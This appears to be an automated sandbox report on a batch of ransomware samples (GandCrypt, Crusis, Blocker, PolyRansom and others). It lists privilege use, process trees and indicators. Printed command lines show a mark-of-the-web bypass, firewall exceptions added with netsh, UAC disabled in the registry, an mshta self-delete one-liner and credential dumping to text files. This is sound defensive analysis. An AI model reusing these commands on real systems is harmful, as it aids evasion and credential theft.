HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Token: SeLoadDriverPrivilege 5060 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Token: SeLoadDriverPrivilege 5060 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Token: SeLoadDriverPrivilege 5060 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Token: SeLoadDriverPrivilege 5060 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Token: SeLoadDriverPrivilege 5060 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Token: SeLoadDriverPrivilege 5060 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Token: SeLoadDriverPrivilege 5060 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Token: SeLoadDriverPrivilege 5060 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Token: SeLoadDriverPrivilege 5060 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Token: SeLoadDriverPrivilege 5060 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Token: SeLoadDriverPrivilege 5060 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Token: SeLoadDriverPrivilege 5060 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Token: SeLoadDriverPrivilege 5060 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Token: SeLoadDriverPrivilege 5060 HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe Token: SeSecurityPrivilege 7844 Trojan-Ransom.Win32.Foreign.nlkp-01285beddeb7d1eee2c04c2b5c9395ccf29b460109c7d9d38276a53ec254a9d5.exe Token: SeBackupPrivilege 1772 vssvc.exe Token: SeRestorePrivilege 1772 vssvc.exe Token: SeAuditPrivilege 1772 vssvc.exe Token: SeDebugPrivilege 4644 HEUR-Trojan-Ransom.MSIL.Crusis.gen-5f056a4a7aff1927cad99e70eae7fa7ed149b5b7f51c6ddd3cdc61993836be4c.exe Token: SeDebugPrivilege 3892 taskmgr.exe Token: SeSystemProfilePrivilege 3892 taskmgr.exe Token: SeCreateGlobalPrivilege 3892 taskmgr.exe Token: SeDebugPrivilege 5500 msiexec.exe Token: SeShutdownPrivilege 7648 YandexPackSetup.exe Token: SeIncreaseQuotaPrivilege 7648 YandexPackSetup.exe Token: SeSecurityPrivilege 6812 msiexec.exe Token: SeCreateTokenPrivilege 7648 YandexPackSetup.exe Token: SeAssignPrimaryTokenPrivilege 7648 YandexPackSetup.exe Token: SeLockMemoryPrivilege 7648 YandexPackSetup.exe Token: SeIncreaseQuotaPrivilege 7648 YandexPackSetup.exe Token: SeMachineAccountPrivilege 7648 YandexPackSetup.exe Token: SeTcbPrivilege 7648 YandexPackSetup.exe Token: SeSecurityPrivilege 7648 YandexPackSetup.exe Token: SeTakeOwnershipPrivilege 7648 YandexPackSetup.exe Token: SeLoadDriverPrivilege 7648 YandexPackSetup.exe Token: SeSystemProfilePrivilege 7648 YandexPackSetup.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2144 7zFM.exe 2144 7zFM.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 3232 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 3232 taskmgr.exe 5056 taskmgr.exe 3232 taskmgr.exe 5056 taskmgr.exe 3232 taskmgr.exe 5056 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 3232 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 3232 taskmgr.exe 5056 taskmgr.exe 3232 taskmgr.exe 5056 taskmgr.exe 3232 taskmgr.exe 5056 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 3232 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe 5056 taskmgr.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
pid Process 5584 Trojan-Ransom.Win32.Blocker.ljhr-98939aa778b7528b635c5336dfd9d7a3ca292de233c2866e50408af34b211921.exe 5596 Trojan-Ransom.Win32.Blocker.ljyl-cfd34633ddda4e6dda707f48d589ebb3a226dd53d99a16b9734605e2fbf3d75e.exe 6620 Trojan-Ransom.Win32.Foreign.oafd-3887453dd2419266bdba711d7dffabff1f7ec5b2eef4d219e0b86103566192a2.exe 7580 FB_8EBE.tmp.exe 5172 HEUR-Trojan-Ransom.Win32.Blocker.gen-8e88dabf8ab275398f5048f337250ac7a52c637a9d435b61b8ec9cbcb6fe4a7e.exe 3432 Explorer.EXE 3432 Explorer.EXE 3432 Explorer.EXE 3432 Explorer.EXE 3432 Explorer.EXE -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 3432 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3232 wrote to memory of 5056 3232 taskmgr.exe 101 PID 3232 wrote to memory of 5056 3232 taskmgr.exe 101 PID 1052 wrote to memory of 2108 1052 powershell.exe 107 PID 1052 wrote to memory of 2108 1052 powershell.exe 107 PID 2108 wrote to memory of 4644 2108 cmd.exe 108 PID 2108 wrote to memory of 4644 2108 cmd.exe 108 PID 2108 wrote to memory of 4644 2108 cmd.exe 108 PID 2108 wrote to memory of 4960 2108 cmd.exe 109 PID 2108 wrote to memory of 4960 2108 cmd.exe 109 PID 2108 wrote to memory of 4960 2108 cmd.exe 109 PID 2108 wrote to memory of 3812 2108 cmd.exe 110 PID 2108 wrote to memory of 3812 2108 cmd.exe 110 PID 2108 wrote to memory of 3812 2108 cmd.exe 110 PID 2108 wrote to memory of 5060 2108 cmd.exe 111 PID 2108 wrote to memory of 5060 2108 cmd.exe 111 PID 2108 wrote to memory of 5060 2108 cmd.exe 111 PID 2108 wrote to memory of 2612 2108 cmd.exe 112 PID 2108 wrote to memory of 2612 2108 cmd.exe 112 PID 2108 wrote to memory of 2612 2108 cmd.exe 112 PID 2612 wrote to memory of 4296 2612 HEUR-Trojan-Ransom.Win32.Generic-5fbf1d6bce0e85dd7f944b5c5c44bc38bb23357b9988aecf213cf393e8a1e92b.exe 113 PID 2612 wrote to memory of 4296 2612 HEUR-Trojan-Ransom.Win32.Generic-5fbf1d6bce0e85dd7f944b5c5c44bc38bb23357b9988aecf213cf393e8a1e92b.exe 113 PID 2612 wrote to memory of 4296 2612 HEUR-Trojan-Ransom.Win32.Generic-5fbf1d6bce0e85dd7f944b5c5c44bc38bb23357b9988aecf213cf393e8a1e92b.exe 113 PID 2612 wrote to memory of 4296 2612 HEUR-Trojan-Ransom.Win32.Generic-5fbf1d6bce0e85dd7f944b5c5c44bc38bb23357b9988aecf213cf393e8a1e92b.exe 113 PID 2612 wrote to memory of 4296 2612 HEUR-Trojan-Ransom.Win32.Generic-5fbf1d6bce0e85dd7f944b5c5c44bc38bb23357b9988aecf213cf393e8a1e92b.exe 113 PID 2612 wrote to memory of 4296 2612 HEUR-Trojan-Ransom.Win32.Generic-5fbf1d6bce0e85dd7f944b5c5c44bc38bb23357b9988aecf213cf393e8a1e92b.exe 113 PID 2612 wrote to memory of 4296 2612 HEUR-Trojan-Ransom.Win32.Generic-5fbf1d6bce0e85dd7f944b5c5c44bc38bb23357b9988aecf213cf393e8a1e92b.exe 113 PID 2612 wrote to memory of 4296 2612 HEUR-Trojan-Ransom.Win32.Generic-5fbf1d6bce0e85dd7f944b5c5c44bc38bb23357b9988aecf213cf393e8a1e92b.exe 113 PID 2612 wrote to memory of 4296 2612 HEUR-Trojan-Ransom.Win32.Generic-5fbf1d6bce0e85dd7f944b5c5c44bc38bb23357b9988aecf213cf393e8a1e92b.exe 113 PID 2108 wrote to memory of 2664 2108 cmd.exe 114 PID 2108 wrote to memory of 2664 2108 cmd.exe 114 PID 2108 wrote to memory of 2664 2108 cmd.exe 114 PID 2108 wrote to memory of 5356 2108 cmd.exe 335 PID 2108 wrote to memory of 5356 2108 cmd.exe 335 PID 2108 wrote to memory of 5356 2108 cmd.exe 335 PID 2108 wrote to memory of 5516 2108 cmd.exe 120 PID 2108 wrote to memory of 5516 2108 cmd.exe 120 PID 2108 wrote to memory of 5516 2108 cmd.exe 120 PID 2108 wrote to memory of 5540 2108 cmd.exe 121 PID 2108 wrote to memory of 5540 2108 cmd.exe 121 PID 2108 wrote to memory of 5540 2108 cmd.exe 121 PID 2108 wrote to memory of 5552 2108 cmd.exe 122 PID 2108 wrote to memory of 5552 2108 cmd.exe 122 PID 2108 wrote to memory of 5552 2108 cmd.exe 122 PID 2108 wrote to memory of 5568 2108 cmd.exe 123 PID 2108 wrote to memory of 5568 2108 cmd.exe 123 PID 2108 wrote to memory of 5568 2108 cmd.exe 123 PID 2108 wrote to memory of 5584 2108 cmd.exe 124 PID 2108 wrote to memory of 5584 2108 cmd.exe 124 PID 2108 wrote to memory of 5584 2108 cmd.exe 124 PID 2108 wrote to memory of 5596 2108 cmd.exe 125 PID 2108 wrote to memory of 5596 2108 cmd.exe 125 PID 2108 wrote to memory of 5596 2108 cmd.exe 125 PID 2108 wrote to memory of 5616 2108 cmd.exe 126 PID 2108 wrote to memory of 5616 2108 cmd.exe 126 PID 2108 wrote to memory of 5616 2108 cmd.exe 126 PID 2108 wrote to memory of 5628 2108 cmd.exe 127 PID 2108 wrote to memory of 5628 2108 cmd.exe 127 PID 2108 wrote to memory of 5628 2108 cmd.exe 127 PID 5616 wrote to memory of 5748 5616 Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe 129 PID 5616 wrote to memory of 5748 5616 Trojan-Ransom.Win32.Crusis.to-21e457408a5bff7c49eca1ace5b4837b02981a50b1d869e8ab424f2f16a60bc6.exe 129 PID 5568 wrote to memory of 7580 5568 Trojan-Ransom.Win32.Blocker.hrft-bb30fd0649110b8de931a723bcf93b126a3cc72ae85997b53e706003db96d46f.exe 133 PID 5568 wrote to memory of 7580 5568 Trojan-Ransom.Win32.Blocker.hrft-bb30fd0649110b8de931a723bcf93b126a3cc72ae85997b53e706003db96d46f.exe 133 PID 4960 wrote to memory of 5500 4960 HEUR-Trojan-Ransom.Win32.Blocker.gen-8e88dabf8ab275398f5048f337250ac7a52c637a9d435b61b8ec9cbcb6fe4a7e.exe 134 PID 4960 wrote to memory of 5500 4960 HEUR-Trojan-Ransom.Win32.Blocker.gen-8e88dabf8ab275398f5048f337250ac7a52c637a9d435b61b8ec9cbcb6fe4a7e.exe 134 -
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Trojan-Ransom.Win32.Foreign.nlkp-01285beddeb7d1eee2c04c2b5c9395ccf29b460109c7d9d38276a53ec254a9d5.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Trojan-Ransom.Win32.Foreign.ogko-b846630e62ef6507d2d54b17da3fcfd395278cb33bf2bfc6b2629b0d7eff474a.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Trojan-Ransom.Win32.Foreign.ogko-b846630e62ef6507d2d54b17da3fcfd395278cb33bf2bfc6b2629b0d7eff474a.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Adds Run key to start application
- Drops desktop.ini file(s)
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
PID:3432 -
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00369.7z"2⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2144
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /42⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3232 -
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /13⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5056
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1052 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:2108 -
C:\Users\Admin\Desktop\00369\HEUR-Trojan-Ransom.MSIL.Crusis.gen-5f056a4a7aff1927cad99e70eae7fa7ed149b5b7f51c6ddd3cdc61993836be4c.exeHEUR-Trojan-Ransom.MSIL.Crusis.gen-5f056a4a7aff1927cad99e70eae7fa7ed149b5b7f51c6ddd3cdc61993836be4c.exe4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4644 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C type nul > "HEUR-Trojan-Ransom.MSIL.Crusis.gen-5f056a4a7aff1927cad99e70eae7fa7ed149b5b7f51c6ddd3cdc61993836be4c.exe:Zone.Identifier"5⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
PID:3856
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C type nul > "HEUR-Trojan-Ransom.MSIL.Crusis.gen-5f056a4a7aff1927cad99e70eae7fa7ed149b5b7f51c6ddd3cdc61993836be4c.exe:Zone.Identifier"5⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
PID:4616
-
-
C:\Users\Admin\Desktop\00369\HEUR-Trojan-Ransom.MSIL.Crusis.gen-5f056a4a7aff1927cad99e70eae7fa7ed149b5b7f51c6ddd3cdc61993836be4c.exe"HEUR-Trojan-Ransom.MSIL.Crusis.gen-5f056a4a7aff1927cad99e70eae7fa7ed149b5b7f51c6ddd3cdc61993836be4c.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3608
-
-
-
C:\Users\Admin\Desktop\00369\HEUR-Trojan-Ransom.Win32.Blocker.gen-8e88dabf8ab275398f5048f337250ac7a52c637a9d435b61b8ec9cbcb6fe4a7e.exeHEUR-Trojan-Ransom.Win32.Blocker.gen-8e88dabf8ab275398f5048f337250ac7a52c637a9d435b61b8ec9cbcb6fe4a7e.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4960 -
C:\Windows\SysWOW64\msiexec.exeC:\Windows\SysWOW64\msiexec.exe5⤵
- Modifies WinLogon for persistence
- Suspicious use of AdjustPrivilegeToken
PID:5500
-
-
C:\Users\Admin\Desktop\00369\HEUR-Trojan-Ransom.Win32.Blocker.gen-8e88dabf8ab275398f5048f337250ac7a52c637a9d435b61b8ec9cbcb6fe4a7e.exeHEUR-Trojan-Ransom.Win32.Blocker.gen-8e88dabf8ab275398f5048f337250ac7a52c637a9d435b61b8ec9cbcb6fe4a7e.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5172
-
-
-
C:\Users\Admin\Desktop\00369\HEUR-Trojan-Ransom.Win32.Encoder.gen-0c3b09213f642af5d6bca1708d167052f7fe198e5eced0e78584d8eb910b8d3c.exeHEUR-Trojan-Ransom.Win32.Encoder.gen-0c3b09213f642af5d6bca1708d167052f7fe198e5eced0e78584d8eb910b8d3c.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3812 -
C:\Users\Admin\AppData\Local\Temp\y_installer.exeC:\Users\Admin\AppData\Local\Temp\y_installer.exe --partner 351634 --distr /quiet /msicl "YABROWSER=y YAHOMEPAGE=y YAQSEARCH=y YABM=y VID=666"5⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies system certificate store
PID:10072 -
C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe"C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe" /quiet /msicl "YABROWSER=y YAHOMEPAGE=y YAQSEARCH=y YABM=y VID=666"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:7648
-
-
C:\Users\Admin\AppData\Local\Temp\y_installer.exeC:\Users\Admin\AppData\Local\Temp\y_installer.exe --stat dwnldr/p=351634/cnt=0/dt=11/ct=0/rt=0 --dh 1924 --st 17309953446⤵
- Executes dropped EXE
PID:1984
-
-
-
-
C:\Users\Admin\Desktop\00369\HEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exeHEUR-Trojan-Ransom.Win32.GandCrypt.pef-0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e.exe4⤵
- Executes dropped EXE
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:5060 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5060 -s 4885⤵
- Program crash
PID:5444
-
-
-
C:\Users\Admin\Desktop\00369\HEUR-Trojan-Ransom.Win32.Generic-5fbf1d6bce0e85dd7f944b5c5c44bc38bb23357b9988aecf213cf393e8a1e92b.exeHEUR-Trojan-Ransom.Win32.Generic-5fbf1d6bce0e85dd7f944b5c5c44bc38bb23357b9988aecf213cf393e8a1e92b.exe4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2612 -
C:\Users\Admin\Desktop\00369\HEUR-Trojan-Ransom.Win32.Generic-5fbf1d6bce0e85dd7f944b5c5c44bc38bb23357b9988aecf213cf393e8a1e92b.exeHEUR-Trojan-Ransom.Win32.Generic-5fbf1d6bce0e85dd7f944b5c5c44bc38bb23357b9988aecf213cf393e8a1e92b.exe5⤵
- Executes dropped EXE
PID:4296
-
-
-
C:\Users\Admin\Desktop\00369\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-00d1138e3b5ca732b50329d4e0fafa80f9bb216eefc0d4b64ba1f4eb1783fd77.exeHEUR-Trojan-Ransom.Win32.PolyRansom.gen-00d1138e3b5ca732b50329d4e0fafa80f9bb216eefc0d4b64ba1f4eb1783fd77.exe4⤵
- Modifies WinLogon for persistence
- Drops startup file
- Executes dropped EXE
- Enumerates connected drives
- Drops autorun.inf file
- Drops file in System32 directory
PID:2664
-
-
C:\Users\Admin\Desktop\00369\HEUR-Trojan-Ransom.Win32.Shade.gen-e37e5186abb272b2b6316ccc20beee61dec07f62ae70cad2c6c080a5cfb8f145.exeHEUR-Trojan-Ransom.Win32.Shade.gen-e37e5186abb272b2b6316ccc20beee61dec07f62ae70cad2c6c080a5cfb8f145.exe4⤵
- Executes dropped EXE
PID:5356
-
-
C:\Users\Admin\Desktop\00369\Trojan-Ransom.Win32.Autoit.ln-83a0d42ec19b724749bf833f5a03578f223f7911dc1f4f99705ec17a52d5d150.exeTrojan-Ransom.Win32.Autoit.ln-83a0d42ec19b724749bf833f5a03578f223f7911dc1f4f99705ec17a52d5d150.exe4⤵
- Executes dropped EXE
PID:5516 -
C:\Users\Admin\Desktop\00369\Trojan-Ransom.Win32.Autoit.ln-83a0d42ec19b724749bf833f5a03578f223f7911dc1f4f99705ec17a52d5d150.exe"C:\Users\Admin\Desktop\00369\Trojan-Ransom.Win32.Autoit.ln-83a0d42ec19b724749bf833f5a03578f223f7911dc1f4f99705ec17a52d5d150.exe"5⤵PID:6272
-
-
C:\Users\Admin\Desktop\00369\Trojan-Ransom.Win32.Autoit.ln-83a0d42ec19b724749bf833f5a03578f223f7911dc1f4f99705ec17a52d5d150.exe"C:\Users\Admin\Desktop\00369\Trojan-Ransom.Win32.Autoit.ln-83a0d42ec19b724749bf833f5a03578f223f7911dc1f4f99705ec17a52d5d150.exe"5⤵PID:5648
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\Desktop\00369\Trojan-Ransom.Win32.Autoit.ln-83a0d42ec19b724749bf833f5a03578f223f7911dc1f4f99705ec17a52d5d150.exe" "C:\Users\Admin\AppData\Roaming\win32x64.exe"6⤵PID:7432
-
-
C:\Users\Admin\AppData\Roaming\win32x64.exe"C:\Users\Admin\AppData\Roaming\win32x64.exe"6⤵PID:6772
-
-
C:\Windows\SysWOW64\mshta.exemshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('Trojan-Ransom.Win32.Autoit.ln-83a0d42ec19b724749bf833f5a03578f223f7911dc1f4f99705ec17a52d5d150.exe');close()}catch(e){}},10);"6⤵PID:1412
-
-
-
-
C:\Users\Admin\Desktop\00369\Trojan-Ransom.Win32.Bitman.qlg-a47717baafc3aa5eac65be9c1607925bef87397e82e94fb9a2615306acb14b13.exeTrojan-Ransom.Win32.Bitman.qlg-a47717baafc3aa5eac65be9c1607925bef87397e82e94fb9a2615306acb14b13.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5540 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 3165⤵
- Program crash
PID:6140
-
-
-
C:\Users\Admin\Desktop\00369\Trojan-Ransom.Win32.Blocker.egtr-f8311aaf01ebe54c0faa5b4b1011186c88a72d9bfe879051432885c58d8e5262.exeTrojan-Ransom.Win32.Blocker.egtr-f8311aaf01ebe54c0faa5b4b1011186c88a72d9bfe879051432885c58d8e5262.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Enumerates connected drives
PID:5552 -
C:\Windows\SysWOW64\netsh.exe"C:\Windows\system32\netsh.exe" firewall add allowedprogram C:\Users\Admin\AppData\Local\bd.exe RemoteSupport ENABLE5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:7540
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\system32\netsh.exe" firewall add allowedprogram C:\Users\Admin\AppData\Local\email.exe RemoteSupport ENABLE5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5260
-
-
-
C:\Users\Admin\Desktop\00369\Trojan-Ransom.Win32.Blocker.hrft-bb30fd0649110b8de931a723bcf93b126a3cc72ae85997b53e706003db96d46f.exeTrojan-Ransom.Win32.Blocker.hrft-bb30fd0649110b8de931a723bcf93b126a3cc72ae85997b53e706003db96d46f.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5568 -
C:\Users\Admin\AppData\Local\Temp\FB_8EBE.tmp.exe"C:\Users\Admin\AppData\Local\Temp\FB_8EBE.tmp.exe"5⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:7580
-
-
C:\Users\Admin\AppData\Local\Temp\FB_97F6.tmp.com"C:\Users\Admin\AppData\Local\Temp\FB_97F6.tmp.com"5⤵
- Executes dropped EXE
PID:6336 -
C:\Users\Admin\AppData\Roaming\config.exe"C:\Users\Admin\AppData\Roaming\config.exe"6⤵
- Executes dropped EXE
PID:2192 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\config.exe" "config.exe" ENABLE7⤵
- Modifies Windows Firewall
PID:6816
-
-
-
-
-
C:\Users\Admin\Desktop\00369\Trojan-Ransom.Win32.Blocker.ljhr-98939aa778b7528b635c5336dfd9d7a3ca292de233c2866e50408af34b211921.exeTrojan-Ransom.Win32.Blocker.ljhr-98939aa778b7528b635c5336dfd9d7a3ca292de233c2866e50408af34b211921.exe4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5584 -
C:\Users\Admin\Desktop\00369\Trojan-Ransom.Win32.Blocker.ljhr-98939aa778b7528b635c5336dfd9d7a3ca292de233c2866e50408af34b211921.exerojan-Ransom.Win32.Blocker.ljhr-98939aa778b7528b635c5336dfd9d7a3ca292de233c2866e50408af34b211921.exe5⤵PID:5308
-
C:\Users\Admin\AppData\Roaming\Windows Update.exe"C:\Users\Admin\AppData\Roaming\Windows Update.exe"6⤵PID:7916
-
C:\Users\Admin\AppData\Roaming\Windows Update.exeC:\Users\Admin\AppData\Roaming\Windows Update.exe"7⤵PID:1532
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"8⤵PID:8464
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"8⤵PID:8756
-
-
-
-
-
-
